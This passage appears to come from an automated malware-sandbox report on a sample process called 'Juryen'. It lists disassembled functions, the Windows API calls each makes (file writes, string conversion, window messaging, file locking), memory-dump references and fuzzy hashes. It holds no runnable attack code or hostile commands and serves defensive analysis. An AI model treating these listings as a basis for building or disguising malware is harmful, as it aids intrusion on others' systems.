                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3917621476-0
                                                                    • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                    • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                    Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                    • String ID:
                                                                    • API String ID: 822687973-0
                                                                    • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                    • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                    Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                    • malloc.MSVCRT ref: 00417459
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
                                                                    • free.MSVCRT ref: 0041747F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                    • String ID:
                                                                    • API String ID: 2605342592-0
                                                                    • Opcode ID: 4f6da64b03b6c84002c909cf9dcc8042fee6eba1d3d37644ca2334bf0aecddb0
                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                    • Opcode Fuzzy Hash: 4f6da64b03b6c84002c909cf9dcc8042fee6eba1d3d37644ca2334bf0aecddb0
                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                    Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 2678498856-0
                                                                    • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                    • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                    Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Item
                                                                    • String ID:
                                                                    • API String ID: 3888421826-0
                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                    Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00417B7B
                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                    • String ID:
                                                                    • API String ID: 3727323765-0
                                                                    • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                    • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                    Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F673
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                    Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                    • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                    Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00402FD7
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                    • strlen.MSVCRT ref: 00403006
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                    • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                    Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                    • String ID:
                                                                    • API String ID: 764393265-0
                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                    Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Time$System$File$LocalSpecific
                                                                    • String ID:
                                                                    • API String ID: 979780441-0
                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                    Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                    • String ID:
                                                                    • API String ID: 1386444988-0
                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                    Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(02220048), ref: 0044DF01
                                                                    • ??3@YAXPAX@Z.MSVCRT(00977028), ref: 0044DF11
                                                                    • ??3@YAXPAX@Z.MSVCRT(00977838), ref: 0044DF21
                                                                    • ??3@YAXPAX@Z.MSVCRT(00977430), ref: 0044DF31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                    Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateMessageRectSend
                                                                    • String ID: d=E
                                                                    • API String ID: 909852535-3703654223
                                                                    • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                    • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                    Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$memcpywcslen
                                                                    • String ID: "
                                                                    • API String ID: 1983396471-123907689
                                                                    • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                    • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                    Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                    • String ID: URL
                                                                    • API String ID: 2108176848-3574463123
                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                    Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfmemcpy
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2789212964-323797159
                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                    Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf
